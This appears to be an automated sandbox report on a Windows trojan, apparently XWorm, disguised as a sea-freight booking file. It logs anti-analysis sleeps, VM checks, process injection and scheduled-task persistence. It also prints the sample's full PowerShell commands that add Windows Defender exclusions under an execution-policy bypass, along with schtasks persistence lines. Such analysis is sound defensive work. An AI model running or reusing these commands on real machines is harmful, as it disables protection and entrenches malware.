Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5349	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5706	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 821	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Window / User API: threadDelayed 6874	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Window / User API: threadDelayed 2956	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8194
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 747
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7015
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2679
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7611
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2071
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5762
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4041

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe TID: 6756	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360	Thread sleep count: 5349 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7336	Thread sleep count: 218 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7480	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7500	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe TID: 7496	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe TID: 7704	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7816	Thread sleep count: 8194 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7804	Thread sleep count: 747 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7860	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe TID: 8032	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8168	Thread sleep count: 7015 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8164	Thread sleep count: 2679 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep count: 7611 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep count: 2071 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1076	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384	Thread sleep count: 5762 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384	Thread sleep count: 4041 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Local\XClient.exe TID: 7784	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\XClient.exe TID: 2832	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\XClient.exe TID: 7652	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\XClient.exe TID: 8164	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477

Source: XClient.exe, 00000020.00000002.2296750586.0000000006DC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\B
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4190479980.0000000000F71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\XClient.exe'
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\XClient.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory written: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory written: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\XClient.exe	Memory written: C:\Users\user\AppData\Local\XClient.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\XClient.exe	Memory written: C:\Users\user\AppData\Local\XClient.exe base: 400000 value starts with: 4D5A

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp378C.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp5296.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process created: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmpDDBF.tmp"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp125.tmp"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4195467542.0000000002D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4195467542.0000000002D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-^q
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4195467542.0000000002D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4195467542.0000000002D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4195467542.0000000002D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q\|e

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
